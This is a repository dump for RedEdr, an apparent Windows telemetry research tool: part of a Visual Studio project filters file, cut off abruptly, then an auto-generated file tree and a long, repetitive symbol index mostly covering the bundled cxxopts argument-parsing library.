<Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
<Filter Include="Source Files\input">
<UniqueIdentifier>{729c11c2-6cba-4b6a-b0bc-56d18a3f3dfd}</UniqueIdentifier>
</Filter>
<Filter Include="Source Files\web">
<UniqueIdentifier>{81c69665-cc45-4ca7-b535-9be661578dff}</UniqueIdentifier>
</Filter>
<Filter Include="Header Files\input">
<UniqueIdentifier>{71afe3f2-d067-4212-afab-cd324e6885df}</UniqueIdentifier>
</Filter>
<Filter Include="Source Files\process">
<UniqueIdentifier>{e6905749-0e08-4e18-a4f4-4f769d79fd46}</UniqueIdentifier>
</Filter>
<Filter Include="Header Files\libs">
<UniqueIdentifier>{b5b02dc7-53a6-4d22-bfa6-a4102b950d4c}</UniqueIdentifier>
</Filter>
<Filter Include="Header Files\process">
<UniqueIdentifier>{f0d7fa81-5b59-4e94-a796-11bd411a1184}</UniqueIdentifier>
</Filter>
<Filter Include="Header Files\windows">
<UniqueIdentifier>{f74d6ae9-c05b-493d-9ee1-76ea79ba0703}</UniqueIdentifier>
</Filter>
<Filter Include="Source Files\windows">
<UniqueIdentifier>{df7f6388-9e99-46c4-89bf-2a931b922311}</UniqueIdentifier>
</Filter>
<Filter Include="Source Files\existing">
<UniqueIdentifier>{aac45432-501a-4c40-8440-16c4e8725eb9}</UniqueIdentifier>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="RedEdr.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="config.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="serviceutils.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="webserver.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="etwreader.cpp">
<Filter>Source Files\input</Filter>
</ClCompile>
<ClCompile Include="dllreader.cpp">
<Filter>Source Files\input</Filter>
</ClCompile>
<ClCompile Include="kernelreader.cpp">
<Filter>Source Files\input</Filter>
</ClCompile>
<ClCompile Include="kernelinterface.cpp">
<Filter>Source Files\input</Filter>
</ClCompile>
<ClCompile Include="pplmanager.cpp">
<Filter>Source Files\input</Filter>
</ClCompile>
<ClCompile Include="pplreader.cpp">
<Filter>Source Files\input</Filter>
</ClCompile>
<ClCompile Include="logreader.cpp">
<Filter>Source Files\input</Filter>
</ClCompile>
<ClCompile Include="manager.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="dllinjector.cpp">
<Filter>Source Files\windows</Filter>
</ClCompile>
<ClCompile Include="event_aggregator.cpp">
<Filter>Source Files\process</Filter>
</ClCompile>
<ClCompile Include="event_processor.cpp">
<Filter>Source Files\process</Filter>
</ClCompile>
<ClCompile Include="event_augmenter.cpp">
<Filter>Source Files\process</Filter>
</ClCompile>
<ClCompile Include="..\RedEdrShared\etw_krabs.cpp">
<Filter>Source Files\existing</Filter>
</ClCompile>
<ClCompile Include="..\RedEdrShared\process_query.cpp">
<Filter>Source Files\existing</Filter>
</ClCompile>
<ClCompile Include="pri
gitextract_ihdwzsgx/ ├── .gitattributes ├── .gitignore ├── CLAUDE.md ├── Data/ │ ├── dostuff.events.json │ └── generator.txt ├── Doc/ │ ├── api.md │ └── notes.md ├── LICENSE.txt ├── README.md ├── RedEdr/ │ ├── RedEdr.cpp │ ├── RedEdr.vcxproj │ ├── RedEdr.vcxproj.filters │ ├── config.cpp │ ├── config.h │ ├── cxxops.hpp │ ├── design.css │ ├── dllinjector.cpp │ ├── dllinjector.h │ ├── dllreader.cpp │ ├── dllreader.h │ ├── etwreader.cpp │ ├── etwreader.h │ ├── event_aggregator.cpp │ ├── event_aggregator.h │ ├── event_augmenter.cpp │ ├── event_augmenter.h │ ├── event_processor.cpp │ ├── event_processor.h │ ├── httplib.h │ ├── index.html │ ├── jsonw.hpp │ ├── kernelinterface.cpp │ ├── kernelinterface.h │ ├── kernelreader.cpp │ ├── kernelreader.h │ ├── logging.cpp │ ├── logging.h │ ├── logreader.cpp │ ├── logreader.h │ ├── manager.cpp │ ├── manager.h │ ├── packages.config │ ├── pplmanager.cpp │ ├── pplmanager.h │ ├── pplreader.cpp │ ├── pplreader.h │ ├── privileges.cpp │ ├── privileges.h │ ├── serviceutils.cpp │ ├── serviceutils.h │ ├── shared.js │ ├── webserver.cpp │ └── webserver.h ├── RedEdr.sln ├── RedEdrDll/ │ ├── RedEdrDll.filters │ ├── RedEdrDll.vcxproj │ ├── RedEdrDll.vcxproj.filters │ ├── detours.h │ ├── detours.lib │ ├── dllhelper.cpp │ ├── dllhelper.h │ ├── dllmain.cpp │ ├── framework.h │ ├── logging.cpp │ └── logging.h ├── RedEdrDriver/ │ ├── Driver.c │ ├── MyDumbEDRDriver.inf │ ├── RedEdrDriver.inf │ ├── RedEdrDriver.vcxproj │ ├── RedEdrDriver.vcxproj.filters │ ├── hashcache.c │ ├── hashcache.h │ ├── kapcinjector.c │ ├── kapcinjector.h │ ├── kcallbacks.c │ ├── kcallbacks.h │ ├── settings.c │ ├── settings.h │ ├── upipe.c │ ├── upipe.h │ ├── utils.c │ └── utils.h ├── RedEdrPplService/ │ ├── README.md │ ├── RedEdrPplService.cpp │ ├── RedEdrPplService.vcxproj │ ├── RedEdrPplService.vcxproj.filters │ ├── control.cpp │ ├── control.h │ ├── emitter.cpp │ ├── emitter.h │ ├── etwtihandler.cpp │ ├── etwtihandler.h │ ├── etwtireader.cpp │ ├── etwtireader.h │ ├── 
logging.cpp │ ├── logging.h │ ├── packages.config │ └── uthash.h ├── RedEdrShared/ │ ├── RedEdrShared.vcxproj │ ├── RedEdrShared.vcxproj.filters │ ├── etw_krabs.cpp │ ├── etw_krabs.h │ ├── json.hpp │ ├── loguru.cpp │ ├── loguru.hpp │ ├── mypeb.h │ ├── myprocess.cpp │ ├── myprocess.h │ ├── packages.config │ ├── piping.cpp │ ├── piping.h │ ├── process_mem_static.cpp │ ├── process_mem_static.h │ ├── process_query.cpp │ ├── process_query.h │ ├── process_resolver.cpp │ ├── process_resolver.h │ ├── ranges.cpp │ ├── ranges.h │ ├── utils.cpp │ └── utils.h ├── RedEdrTester/ │ ├── RedEdrTester.cpp │ ├── RedEdrTester.vcxproj │ ├── RedEdrTester.vcxproj.filters │ └── packages.config ├── Shared/ │ └── common.h ├── UnitTests/ │ ├── UnitTestAnalyzer.cpp │ ├── UnitTestEventProducer.cpp │ ├── UnitTestProcessInfo.cpp │ ├── UnitTestRanges.cpp │ ├── UnitTests.cpp │ ├── UnitTests.vcxproj │ ├── UnitTests.vcxproj.filters │ ├── logging.cpp │ ├── logging.h │ └── notepad.json ├── azure_config.json.sample ├── azure_upload.ps1 ├── elam_driver/ │ ├── elam_driver.c │ ├── elam_driver.rc │ ├── elam_driver.vcxproj │ └── elam_driver.vcxproj.Filters ├── generate_cert.ps1 ├── rededr_ppl.pfx ├── rededr_test.ps1 └── sign_file.ps1
SYMBOL INDEX (1246 symbols across 71 files)
FILE: RedEdr/RedEdr.cpp
function ConsoleCtrlHandler (line 29) | BOOL WINAPI ConsoleCtrlHandler(DWORD ctrlType) {
function CreateRequiredFiles (line 45) | void CreateRequiredFiles() {
function main (line 57) | int main(int argc, char* argv[]) {
FILE: RedEdr/config.h
class Config (line 7) | class Config {
FILE: RedEdr/cxxops.hpp
type cxxopts (line 121) | namespace cxxopts {
function String (line 144) | inline
class UnicodeStringIterator (line 156) | class UnicodeStringIterator
method UnicodeStringIterator (line 166) | UnicodeStringIterator(const icu::UnicodeString* string, int32_t pos)
method value_type (line 172) | value_type
method UnicodeStringIterator (line 190) | UnicodeStringIterator&
method UnicodeStringIterator (line 197) | UnicodeStringIterator
function CXXOPTS_DIAGNOSTIC_POP (line 207) | CXXOPTS_DIAGNOSTIC_POP
function String (line 216) | inline
function String (line 229) | String&
function stringLength (line 241) | inline
function toUTF8String (line 248) | inline
function empty (line 258) | inline
function T (line 293) | T
function stringLength (line 299) | inline
function String (line 306) | inline
function String (line 313) | inline
function String (line 321) | String&
function toUTF8String (line 328) | std::string
function empty (line 334) | inline
class Value (line 362) | class Value : public std::enable_shared_from_this<Value>
function CXXOPTS_DIAGNOSTIC_POP (line 409) | CXXOPTS_DIAGNOSTIC_POP
function throw_or_mimic (line 565) | void throw_or_mimic(const std::string& text)
type values (line 585) | namespace values {
type parser_tool (line 587) | namespace parser_tool {
type IntegerDesc (line 589) | struct IntegerDesc
type ArguDesc (line 595) | struct ArguDesc {
function IntegerDesc (line 603) | inline IntegerDesc SplitInteger(const std::string& text)
function IsTrueText (line 632) | inline bool IsTrueText(const std::string& text)
function IsFalseText (line 650) | inline bool IsFalseText(const std::string& text)
function OptionNames (line 668) | inline OptionNames split_option_names(const std::string& text)
function ArguDesc (line 714) | inline ArguDesc ParseArgument(const char* arg, bool& matched)
function IntegerDesc (line 787) | inline IntegerDesc SplitInteger(const std::string& text)
function IsTrueText (line 814) | inline bool IsTrueText(const std::string& text)
function IsFalseText (line 822) | inline bool IsFalseText(const std::string& text)
function OptionNames (line 833) | inline OptionNames split_option_names(const std::string& text)
function ArguDesc (line 851) | inline ArguDesc ParseArgument(const char* arg, bool& matched)
type detail (line 877) | namespace detail {
type SignedCheck (line 880) | struct SignedCheck
type SignedCheck<T, true> (line 883) | struct SignedCheck<T, true>
type SignedCheck<T, false> (line 907) | struct SignedCheck<T, false>
function check_signed_range (line 915) | void
function checked_negate (line 924) | void
function checked_negate (line 934) | void
function integer_parser (line 941) | void
function stringstream_parser (line 1011) | void stringstream_parser(const std::string& text, T& value)
function parse_value (line 1023) | void parse_value(const std::string& text, T& value)
function parse_value (line 1028) | inline
function parse_value (line 1047) | inline
function parse_value (line 1060) | void
function parse_value (line 1067) | void
function parse_value (line 1076) | inline
function parse_value (line 1088) | void
function add_value (line 1107) | void
function add_value (line 1114) | void
type type_is_container (line 1123) | struct type_is_container
type type_is_container<std::vector<T>> (line 1129) | struct type_is_container<std::vector<T>>
class abstract_value (line 1135) | class abstract_value : public Value
method abstract_value (line 1140) | abstract_value()
method abstract_value (line 1146) | explicit abstract_value(T* t)
method abstract_value (line 1153) | abstract_value& operator=(const abstract_value&) = default;
method abstract_value (line 1155) | abstract_value(const abstract_value& rhs)
method add (line 1173) | void
method parse (line 1179) | void
method is_container (line 1185) | bool
method parse (line 1191) | void
method has_default (line 1197) | bool
method has_implicit (line 1203) | bool
method default_value (line 1209) | std::shared_ptr<Value>
method implicit_value (line 1217) | std::shared_ptr<Value>
method no_implicit_value (line 1225) | std::shared_ptr<Value>
method get_default_value (line 1232) | std::string
method get_implicit_value (line 1238) | std::string
method is_boolean (line 1244) | bool
method T (line 1250) | const T&
class standard_value (line 1272) | class standard_value : public abstract_value<T>
method override (line 1279) | const override
class standard_value<bool> (line 1286) | class standard_value<bool> : public abstract_value<bool>
method standard_value (line 1291) | standard_value()
method standard_value (line 1296) | explicit standard_value(bool* b)
method clone (line 1303) | std::shared_ptr<Value>
method set_default_and_implicit (line 1311) | void
function value (line 1324) | std::shared_ptr<Value>
function value (line 1331) | std::shared_ptr<Value>
class OptionAdder (line 1337) | class OptionAdder
method OptionAdder (line 2088) | OptionAdder(Options& options, std::string group)
function CXXOPTS_NODISCARD (line 1339) | CXXOPTS_NODISCARD
class OptionDetails (line 1348) | class OptionDetails
method OptionDetails (line 1351) | OptionDetails
method OptionDetails (line 1367) | OptionDetails(const OptionDetails& rhs)
method OptionDetails (line 1374) | OptionDetails(OptionDetails&& rhs) = default;
method CXXOPTS_NODISCARD (line 1376) | CXXOPTS_NODISCARD
method CXXOPTS_NODISCARD (line 1383) | CXXOPTS_NODISCARD
method CXXOPTS_NODISCARD (line 1389) | CXXOPTS_NODISCARD
method CXXOPTS_NODISCARD (line 1396) | CXXOPTS_NODISCARD
method CXXOPTS_NODISCARD (line 1403) | CXXOPTS_NODISCARD
method CXXOPTS_NODISCARD (line 1410) | CXXOPTS_NODISCARD
method CXXOPTS_NODISCARD (line 1417) | CXXOPTS_NODISCARD
method hash (line 1424) | std::size_t
type HelpOptionDetails (line 1440) | struct HelpOptionDetails
type HelpGroupDetails (line 1454) | struct HelpGroupDetails
class OptionValue (line 1461) | class OptionValue
method add (line 1464) | void
method parse (line 1477) | void
method parse_default (line 1490) | void
method parse_no_value (line 1499) | void
method noexcept (line 1512) | const noexcept
method CXXOPTS_NODISCARD (line 1522) | CXXOPTS_NODISCARD
method T (line 1530) | const T&
method as_optional (line 1543) | std::optional<T>
method ensure_value (line 1554) | void
class KeyValue (line 1572) | class KeyValue
method KeyValue (line 1575) | KeyValue(std::string key_, std::string value_) noexcept
method CXXOPTS_NODISCARD (line 1581) | CXXOPTS_NODISCARD
method CXXOPTS_NODISCARD (line 1588) | CXXOPTS_NODISCARD
method T (line 1596) | T
class ParseResult (line 1612) | class ParseResult
class Iterator (line 1615) | class Iterator
method Iterator (line 1624) | Iterator() = default;
method Iterator (line 1625) | Iterator(const Iterator&) = default;
method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
method Iterator (line 1665) | Iterator operator++(int)
method KeyValue (line 1682) | const KeyValue& operator*()
method KeyValue (line 1687) | const KeyValue* operator->()
method ParseResult (line 1698) | ParseResult() = default;
method ParseResult (line 1699) | ParseResult(const ParseResult&) = default;
method ParseResult (line 1701) | ParseResult(NameHashMap&& keys, ParsedHashMap&& values, std::vector<...
method ParseResult (line 1711) | ParseResult& operator=(ParseResult&&) = default;
method ParseResult (line 1712) | ParseResult& operator=(const ParseResult&) = default;
method Iterator (line 1714) | Iterator
method Iterator (line 1624) | Iterator() = default;
method Iterator (line 1625) | Iterator(const Iterator&) = default;
method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
method Iterator (line 1665) | Iterator operator++(int)
method KeyValue (line 1682) | const KeyValue& operator*()
method KeyValue (line 1687) | const KeyValue* operator->()
method Iterator (line 1720) | Iterator
method Iterator (line 1624) | Iterator() = default;
method Iterator (line 1625) | Iterator(const Iterator&) = default;
method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
method Iterator (line 1665) | Iterator operator++(int)
method KeyValue (line 1682) | const KeyValue& operator*()
method KeyValue (line 1687) | const KeyValue* operator->()
method count (line 1726) | std::size_t
method OptionValue (line 1745) | const OptionValue&
method as_optional (line 1767) | std::optional<T>
method arguments_string (line 1801) | const std::string
type Option (line 1824) | struct Option
method Option (line 1826) | Option
class OptionParser (line 1850) | class OptionParser
method OptionParser (line 1853) | OptionParser(const OptionMap& options, const PositionalList& positio...
class Options (line 1908) | class Options
method Options (line 1912) | explicit Options(std::string program_name, std::string help_string =...
method Options (line 1925) | Options&
method Options (line 1932) | Options&
method Options (line 1939) | Options&
method Options (line 1946) | Options&
method Options (line 1953) | Options&
method Options (line 1960) | Options&
method add_option (line 1998) | void
method parse_positional (line 2025) | void
class OptionAdder (line 2084) | class OptionAdder
method OptionAdder (line 2088) | OptionAdder(Options& options, std::string group)
function String (line 2112) | String
function String (line 2158) | String
function OptionAdder (line 2303) | inline
method OptionAdder (line 2088) | OptionAdder(Options& options, std::string group)
function OptionAdder (line 2310) | inline
method OptionAdder (line 2088) | OptionAdder(Options& options, std::string group)
function ParseResult (line 2487) | inline
class Iterator (line 1615) | class Iterator
method Iterator (line 1624) | Iterator() = default;
method Iterator (line 1625) | Iterator(const Iterator&) = default;
method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
method Iterator (line 1665) | Iterator operator++(int)
method KeyValue (line 1682) | const KeyValue& operator*()
method KeyValue (line 1687) | const KeyValue* operator->()
method ParseResult (line 1698) | ParseResult() = default;
method ParseResult (line 1699) | ParseResult(const ParseResult&) = default;
method ParseResult (line 1701) | ParseResult(NameHashMap&& keys, ParsedHashMap&& values, std::vector<...
method ParseResult (line 1711) | ParseResult& operator=(ParseResult&&) = default;
method ParseResult (line 1712) | ParseResult& operator=(const ParseResult&) = default;
method Iterator (line 1714) | Iterator
method Iterator (line 1624) | Iterator() = default;
method Iterator (line 1625) | Iterator(const Iterator&) = default;
method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
method Iterator (line 1665) | Iterator operator++(int)
method KeyValue (line 1682) | const KeyValue& operator*()
method KeyValue (line 1687) | const KeyValue* operator->()
method Iterator (line 1720) | Iterator
method Iterator (line 1624) | Iterator() = default;
method Iterator (line 1625) | Iterator(const Iterator&) = default;
method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
method Iterator (line 1665) | Iterator operator++(int)
method KeyValue (line 1682) | const KeyValue& operator*()
method KeyValue (line 1687) | const KeyValue* operator->()
method count (line 1726) | std::size_t
method OptionValue (line 1745) | const OptionValue&
method as_optional (line 1767) | std::optional<T>
method arguments_string (line 1801) | const std::string
function ParseResult (line 2496) | inline ParseResult
class Iterator (line 1615) | class Iterator
method Iterator (line 1624) | Iterator() = default;
method Iterator (line 1625) | Iterator(const Iterator&) = default;
method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
method Iterator (line 1665) | Iterator operator++(int)
method KeyValue (line 1682) | const KeyValue& operator*()
method KeyValue (line 1687) | const KeyValue* operator->()
method ParseResult (line 1698) | ParseResult() = default;
method ParseResult (line 1699) | ParseResult(const ParseResult&) = default;
method ParseResult (line 1701) | ParseResult(NameHashMap&& keys, ParsedHashMap&& values, std::vector<...
method ParseResult (line 1711) | ParseResult& operator=(ParseResult&&) = default;
method ParseResult (line 1712) | ParseResult& operator=(const ParseResult&) = default;
method Iterator (line 1714) | Iterator
method Iterator (line 1624) | Iterator() = default;
method Iterator (line 1625) | Iterator(const Iterator&) = default;
method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
method Iterator (line 1665) | Iterator operator++(int)
method KeyValue (line 1682) | const KeyValue& operator*()
method KeyValue (line 1687) | const KeyValue* operator->()
method Iterator (line 1720) | Iterator
method Iterator (line 1624) | Iterator() = default;
method Iterator (line 1625) | Iterator(const Iterator&) = default;
method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
method Iterator (line 1665) | Iterator operator++(int)
method KeyValue (line 1682) | const KeyValue& operator*()
method KeyValue (line 1687) | const KeyValue* operator->()
method count (line 1726) | std::size_t
method OptionValue (line 1745) | const OptionValue&
method as_optional (line 1767) | std::optional<T>
method arguments_string (line 1801) | const std::string
function String (line 2751) | inline
function HelpGroupDetails (line 2899) | inline
type cxxopts (line 140) | namespace cxxopts {
function String (line 144) | inline
class UnicodeStringIterator (line 156) | class UnicodeStringIterator
method UnicodeStringIterator (line 166) | UnicodeStringIterator(const icu::UnicodeString* string, int32_t pos)
method value_type (line 172) | value_type
method UnicodeStringIterator (line 190) | UnicodeStringIterator&
method UnicodeStringIterator (line 197) | UnicodeStringIterator
function CXXOPTS_DIAGNOSTIC_POP (line 207) | CXXOPTS_DIAGNOSTIC_POP
function String (line 216) | inline
function String (line 229) | String&
function stringLength (line 241) | inline
function toUTF8String (line 248) | inline
function empty (line 258) | inline
function T (line 293) | T
function stringLength (line 299) | inline
function String (line 306) | inline
function String (line 313) | inline
function String (line 321) | String&
function toUTF8String (line 328) | std::string
function empty (line 334) | inline
class Value (line 362) | class Value : public std::enable_shared_from_this<Value>
function CXXOPTS_DIAGNOSTIC_POP (line 409) | CXXOPTS_DIAGNOSTIC_POP
function throw_or_mimic (line 565) | void throw_or_mimic(const std::string& text)
type values (line 585) | namespace values {
type parser_tool (line 587) | namespace parser_tool {
type IntegerDesc (line 589) | struct IntegerDesc
type ArguDesc (line 595) | struct ArguDesc {
function IntegerDesc (line 603) | inline IntegerDesc SplitInteger(const std::string& text)
function IsTrueText (line 632) | inline bool IsTrueText(const std::string& text)
function IsFalseText (line 650) | inline bool IsFalseText(const std::string& text)
function OptionNames (line 668) | inline OptionNames split_option_names(const std::string& text)
function ArguDesc (line 714) | inline ArguDesc ParseArgument(const char* arg, bool& matched)
function IntegerDesc (line 787) | inline IntegerDesc SplitInteger(const std::string& text)
function IsTrueText (line 814) | inline bool IsTrueText(const std::string& text)
function IsFalseText (line 822) | inline bool IsFalseText(const std::string& text)
function OptionNames (line 833) | inline OptionNames split_option_names(const std::string& text)
function ArguDesc (line 851) | inline ArguDesc ParseArgument(const char* arg, bool& matched)
type detail (line 877) | namespace detail {
type SignedCheck (line 880) | struct SignedCheck
type SignedCheck<T, true> (line 883) | struct SignedCheck<T, true>
type SignedCheck<T, false> (line 907) | struct SignedCheck<T, false>
function check_signed_range (line 915) | void
function checked_negate (line 924) | void
function checked_negate (line 934) | void
function integer_parser (line 941) | void
function stringstream_parser (line 1011) | void stringstream_parser(const std::string& text, T& value)
function parse_value (line 1023) | void parse_value(const std::string& text, T& value)
function parse_value (line 1028) | inline
function parse_value (line 1047) | inline
function parse_value (line 1060) | void
function parse_value (line 1067) | void
function parse_value (line 1076) | inline
function parse_value (line 1088) | void
function add_value (line 1107) | void
function add_value (line 1114) | void
type type_is_container (line 1123) | struct type_is_container
type type_is_container<std::vector<T>> (line 1129) | struct type_is_container<std::vector<T>>
class abstract_value (line 1135) | class abstract_value : public Value
method abstract_value (line 1140) | abstract_value()
method abstract_value (line 1146) | explicit abstract_value(T* t)
method abstract_value (line 1153) | abstract_value& operator=(const abstract_value&) = default;
method abstract_value (line 1155) | abstract_value(const abstract_value& rhs)
method add (line 1173) | void
method parse (line 1179) | void
method is_container (line 1185) | bool
method parse (line 1191) | void
method has_default (line 1197) | bool
method has_implicit (line 1203) | bool
method default_value (line 1209) | std::shared_ptr<Value>
method implicit_value (line 1217) | std::shared_ptr<Value>
method no_implicit_value (line 1225) | std::shared_ptr<Value>
method get_default_value (line 1232) | std::string
method get_implicit_value (line 1238) | std::string
method is_boolean (line 1244) | bool
method T (line 1250) | const T&
class standard_value (line 1272) | class standard_value : public abstract_value<T>
method override (line 1279) | const override
class standard_value<bool> (line 1286) | class standard_value<bool> : public abstract_value<bool>
method standard_value (line 1291) | standard_value()
method standard_value (line 1296) | explicit standard_value(bool* b)
method clone (line 1303) | std::shared_ptr<Value>
method set_default_and_implicit (line 1311) | void
function value (line 1324) | std::shared_ptr<Value>
function value (line 1331) | std::shared_ptr<Value>
class OptionAdder (line 1337) | class OptionAdder
method OptionAdder (line 2088) | OptionAdder(Options& options, std::string group)
function CXXOPTS_NODISCARD (line 1339) | CXXOPTS_NODISCARD
class OptionDetails (line 1348) | class OptionDetails
method OptionDetails (line 1351) | OptionDetails
method OptionDetails (line 1367) | OptionDetails(const OptionDetails& rhs)
method OptionDetails (line 1374) | OptionDetails(OptionDetails&& rhs) = default;
method CXXOPTS_NODISCARD (line 1376) | CXXOPTS_NODISCARD
method CXXOPTS_NODISCARD (line 1383) | CXXOPTS_NODISCARD
method CXXOPTS_NODISCARD (line 1389) | CXXOPTS_NODISCARD
method CXXOPTS_NODISCARD (line 1396) | CXXOPTS_NODISCARD
method CXXOPTS_NODISCARD (line 1403) | CXXOPTS_NODISCARD
method CXXOPTS_NODISCARD (line 1410) | CXXOPTS_NODISCARD
method CXXOPTS_NODISCARD (line 1417) | CXXOPTS_NODISCARD
method hash (line 1424) | std::size_t
type HelpOptionDetails (line 1440) | struct HelpOptionDetails
type HelpGroupDetails (line 1454) | struct HelpGroupDetails
class OptionValue (line 1461) | class OptionValue
method add (line 1464) | void
method parse (line 1477) | void
method parse_default (line 1490) | void
method parse_no_value (line 1499) | void
method noexcept (line 1512) | const noexcept
method CXXOPTS_NODISCARD (line 1522) | CXXOPTS_NODISCARD
method T (line 1530) | const T&
method as_optional (line 1543) | std::optional<T>
method ensure_value (line 1554) | void
class KeyValue (line 1572) | class KeyValue
method KeyValue (line 1575) | KeyValue(std::string key_, std::string value_) noexcept
method CXXOPTS_NODISCARD (line 1581) | CXXOPTS_NODISCARD
method CXXOPTS_NODISCARD (line 1588) | CXXOPTS_NODISCARD
method T (line 1596) | T
class ParseResult (line 1612) | class ParseResult
class Iterator (line 1615) | class Iterator
method Iterator (line 1624) | Iterator() = default;
method Iterator (line 1625) | Iterator(const Iterator&) = default;
method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
method Iterator (line 1665) | Iterator operator++(int)
method KeyValue (line 1682) | const KeyValue& operator*()
method KeyValue (line 1687) | const KeyValue* operator->()
method ParseResult (line 1698) | ParseResult() = default;
method ParseResult (line 1699) | ParseResult(const ParseResult&) = default;
method ParseResult (line 1701) | ParseResult(NameHashMap&& keys, ParsedHashMap&& values, std::vector<...
method ParseResult (line 1711) | ParseResult& operator=(ParseResult&&) = default;
method ParseResult (line 1712) | ParseResult& operator=(const ParseResult&) = default;
method Iterator (line 1714) | Iterator
method Iterator (line 1624) | Iterator() = default;
method Iterator (line 1625) | Iterator(const Iterator&) = default;
method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
method Iterator (line 1665) | Iterator operator++(int)
method KeyValue (line 1682) | const KeyValue& operator*()
method KeyValue (line 1687) | const KeyValue* operator->()
method Iterator (line 1720) | Iterator
method Iterator (line 1624) | Iterator() = default;
method Iterator (line 1625) | Iterator(const Iterator&) = default;
method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
method Iterator (line 1665) | Iterator operator++(int)
method KeyValue (line 1682) | const KeyValue& operator*()
method KeyValue (line 1687) | const KeyValue* operator->()
method count (line 1726) | std::size_t
method OptionValue (line 1745) | const OptionValue&
method as_optional (line 1767) | std::optional<T>
method arguments_string (line 1801) | const std::string
type Option (line 1824) | struct Option
method Option (line 1826) | Option
class OptionParser (line 1850) | class OptionParser
method OptionParser (line 1853) | OptionParser(const OptionMap& options, const PositionalList& positio...
class Options (line 1908) | class Options
method Options (line 1912) | explicit Options(std::string program_name, std::string help_string =...
method Options (line 1925) | Options&
method Options (line 1932) | Options&
method Options (line 1939) | Options&
method Options (line 1946) | Options&
method Options (line 1953) | Options&
method Options (line 1960) | Options&
method add_option (line 1998) | void
method parse_positional (line 2025) | void
class OptionAdder (line 2084) | class OptionAdder
method OptionAdder (line 2088) | OptionAdder(Options& options, std::string group)
function String (line 2112) | String
function String (line 2158) | String
function OptionAdder (line 2303) | inline
method OptionAdder (line 2088) | OptionAdder(Options& options, std::string group)
function OptionAdder (line 2310) | inline
method OptionAdder (line 2088) | OptionAdder(Options& options, std::string group)
function ParseResult (line 2487) | inline
class Iterator (line 1615) | class Iterator
method Iterator (line 1624) | Iterator() = default;
method Iterator (line 1625) | Iterator(const Iterator&) = default;
method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
method Iterator (line 1665) | Iterator operator++(int)
method KeyValue (line 1682) | const KeyValue& operator*()
method KeyValue (line 1687) | const KeyValue* operator->()
method ParseResult (line 1698) | ParseResult() = default;
method ParseResult (line 1699) | ParseResult(const ParseResult&) = default;
method ParseResult (line 1701) | ParseResult(NameHashMap&& keys, ParsedHashMap&& values, std::vector<...
method ParseResult (line 1711) | ParseResult& operator=(ParseResult&&) = default;
method ParseResult (line 1712) | ParseResult& operator=(const ParseResult&) = default;
method Iterator (line 1714) | Iterator
method Iterator (line 1624) | Iterator() = default;
method Iterator (line 1625) | Iterator(const Iterator&) = default;
method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
method Iterator (line 1665) | Iterator operator++(int)
method KeyValue (line 1682) | const KeyValue& operator*()
method KeyValue (line 1687) | const KeyValue* operator->()
method Iterator (line 1720) | Iterator
method Iterator (line 1624) | Iterator() = default;
method Iterator (line 1625) | Iterator(const Iterator&) = default;
method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
method Iterator (line 1665) | Iterator operator++(int)
method KeyValue (line 1682) | const KeyValue& operator*()
method KeyValue (line 1687) | const KeyValue* operator->()
method count (line 1726) | std::size_t
method OptionValue (line 1745) | const OptionValue&
method as_optional (line 1767) | std::optional<T>
method arguments_string (line 1801) | const std::string
function ParseResult (line 2496) | inline ParseResult
class Iterator (line 1615) | class Iterator
method Iterator (line 1624) | Iterator() = default;
method Iterator (line 1625) | Iterator(const Iterator&) = default;
